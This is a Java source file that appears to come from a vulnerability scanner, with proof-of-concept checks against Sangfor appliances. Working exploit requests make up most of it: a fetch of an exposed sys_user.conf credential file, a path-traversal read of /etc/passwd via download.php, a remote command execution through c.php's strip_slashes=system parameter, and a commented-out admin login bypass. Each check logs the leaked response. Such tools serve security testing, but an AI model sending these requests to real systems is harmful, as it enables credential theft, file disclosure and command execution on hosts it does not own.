package com.achuna33.Controllers;

import com.achuna33.SupportType.Poc_Exp;
import com.achuna33.SupportType.SupportVul;
import com.achuna33.Utils.Cache;
import com.achuna33.Utils.HttpRequest;
import com.achuna33.Utils.Response;

import java.net.MalformedURLException;

@BasicMapping(uri = "深信服")
public class SangForController  extends Controller implements BasicController{
    @VulnerabilityDescriptionMapping(Description = "深信服 应用交付管理系统 sys_user.conf 账号密码泄漏漏洞",SupportVulType = SupportVul.信息泄露)
    public void vul_sys_user信息泄露(Poc_Exp type, String target, Object... args) throws MalformedURLException {
        WriteLog("\n[*]开始检测：  深信服 应用交付管理系统 sys_user.conf 账号密码泄漏漏洞");


        switch (type){
            case EXP:
                break;
            case POC:
                HttpRequest httpRequest = new HttpRequest(target+"/tmp/updateme/sinfor/ad/sys/sys_user.conf");
                Response result = httpRequest.Get("");
                if((result.responseBody.contains("true") || result.responseBody.contains("admin"))&&result.statusCode==200){
                    WriteLog("\n[*] 存在漏洞");
                    WriteLog("\n[*]"+result.responseBody);
                }else {
                    WriteLog("\n[*] 不存在漏洞");
                }
        }

    }
    @VulnerabilityDescriptionMapping(Description = "深信服 应用交付报表系统 download.php 任意文件读取漏洞",SupportVulType = SupportVul.信息泄露)
    public void vul_download_文件读取(Poc_Exp type, String target, Object... args) throws MalformedURLException {
        WriteLog("\n[*]开始检测：  深信服 应用交付报表系统 download.php 任意文件读取漏洞");


        switch (type){
            case EXP:
                break;
            case POC:
                HttpRequest httpRequest = new HttpRequest(target+"/report/download.php?pdf=../../../../../etc/passwd");
                Response result = httpRequest.Get("");
                if(result.responseBody.contains("root")&&result.statusCode==200){
                    WriteLog("\n[*] 存在漏洞");
                    WriteLog("\n[*]"+result.responseBody);
                }else {
                    WriteLog("\n[*] 不存在漏洞");
                }
        }
    }

    @VulnerabilityDescriptionMapping(Description = "深信服 行为感知系统/日志中心 c.php 远程命令执行漏洞",SupportVulType = SupportVul.RuntimeExec)
    public void vul_c_命令执行(Poc_Exp type, String target, Object... args) throws MalformedURLException {
        WriteLog("\n[*]开始检测：  深信服 行为感知系统/日志中心 c.php 远程命令执行漏洞");


        switch (type){
            case EXP:
                break;
            case POC:
                HttpRequest httpRequest = new HttpRequest(target+"/tool/log/c.php?strip_slashes=system&host=echo%20flag");
                Response result = httpRequest.Get("");
                if(result.responseBody.contains("flag")&&result.statusCode==200){
                    WriteLog("\n[*] 存在漏洞");
                    WriteLog("\n[*]请求地址："+target+"/tool/log/c.php?strip_slashes=system&host=echo%20flag");
                    WriteLog("\n"+result.responseBody);
                }else {
                    WriteLog("\n[*] 不存在漏洞");
                }
        }
    }
//    @VulnerabilityDescriptionMapping(Description = "深信服 终端检测检测平台 ui/login.php 任意用户登录漏洞",SupportVulType = SupportVul.信息泄露)
//    public void vul_loginBypass(Poc_Exp type, String target, Object... args) throws MalformedURLException {
//        Cache.uiController.logTextArea.appendText("\n[*]开始检测：  深信服 终端检测检测平台 ui/login.php 任意用户登录漏洞");
//
//        switch (type){
//            case EXP:
//                break;
//            case POC:
//                HttpRequest httpRequest = new HttpRequest(target+"/ui/login.php?User=admin");
//                Response result = httpRequest.Get("");
//                if(result.statusCode==200){
//                    WriteLog("\n[*] 存在漏洞");
//                    WriteLog("\n[*] 请求地址："+target+"/ui/login.php?user=admin");
//                }else {
//                    WriteLog("\n[*] 不存在漏洞");
//                }
//        }
//    }


}
